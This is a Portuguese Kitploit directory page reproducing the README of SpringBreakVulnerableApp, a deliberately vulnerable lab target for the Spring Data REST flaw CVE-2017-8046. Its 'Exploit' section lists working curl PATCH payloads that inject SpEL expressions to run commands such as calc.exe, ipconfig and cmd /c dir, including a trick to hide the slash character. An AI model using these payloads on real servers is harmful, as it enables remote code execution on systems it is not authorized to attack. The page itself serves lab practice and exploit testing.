Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SpringBreakVulnerableApp — AVISO: Esta é uma aplicação vulnerável para testar o exploit da vulnerabilidade Spring Break (CVE-2017-8046). Execute-a por sua conta e risco! | Kitploit
Ferramentas/GitHubGitHub/m3ssap0/springbreakvulnerableapp
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

AVISO: Esta é uma aplicação vulnerável para testar o exploit da vulnerabilidade Spring Break (CVE-2017-8046). Execute-a por sua conta e risco!

Ver Repositório
14103há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aplicação Vulnerável Spring Break

Esta é uma aplicação vulnerável para testar o exploit para a vulnerabilidade Spring Break (CVE-2017-8046).

AVISO!

Esta aplicação contém sérias vulnerabilidades de segurança. Execute-a por sua conta e risco! Recomenda-se usar um ambiente com backup e isolado (como uma VM com snapshot recente e rede apenas entre host). Não faça upload desta aplicação para servidores expostos à Internet, pois eles serão comprometidos.

AVISO LEGAL: Não me responsabilizo pela forma como qualquer um utiliza esta aplicação (SpringBreakVulnerableApp). O único propósito desta aplicação é ser um cenário de teste para o exploit Spring Break e não deve ser usada maliciosamente. Se o seu servidor for comprometido através de uma instalação do SpringBreakVulnerableApp, não é minha responsabilidade, é responsabilidade da(s) pessoa(s) que o carregou e instalou.

Informações da vulnerabilidade

  • CVE-ID: CVE-2017-8046
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • Descrição: Requisições PATCH maliciosas enviadas a servidores spring-data-rest em versões do Pivotal Spring Data REST anteriores a 2.5.12, 2.6.7, 3.0 RC3, versões do Spring Boot anteriores a 2.0.0M4, e versões do Spring Data anteriores a Kay-RC3 podem usar dados JSON especialmente criados para executar código Java arbitrário.

Uso

A aplicação pode ser iniciada com o seguinte comando Maven.

root@kitploit:~
mvn spring-boot:run

Um fat jar pode ser gerado com o seguinte comando Maven.

root@kitploit:~
mvn clean install spring-boot:repackage

Para inserir dados, pode usar o seguinte comando curl.

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

Exploit

Provavelmente, o exploit mais simples é a seguinte requisição.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

No Windows, o processo calc.exe pode ser iniciado com a seguinte requisição. Requisições semelhantes podem ser usadas para executar comandos arbitrários.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Para obter a saída de comandos executados, alguns "gadgets" oferecidos pelo código do Spring Framework podem ser usados. Felizmente, nenhuma dependência externa é necessária. Por exemplo, o resultado do comando ipconfig pode ser recuperado com a seguinte requisição.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

No Windows, um comando cmd /c dir e outros comandos semelhantes podem ser executados com a seguinte requisição. Observe o truque usado para inserir o caractere barra evitando o valor explícito (ou seja, barras explícitas são substituídas por pontos antes da análise real).

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Um programa Java para explorar esta vulnerabilidade pode ser encontrado aqui.

Autores

  • Antonio Francesco Sardella - implementação - m3ssap0

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE.txt para obter detalhes.

Agradecimentos

  • Man Yue Mo o pesquisador de segurança que descobriu a vulnerabilidade
Baixar ferramenta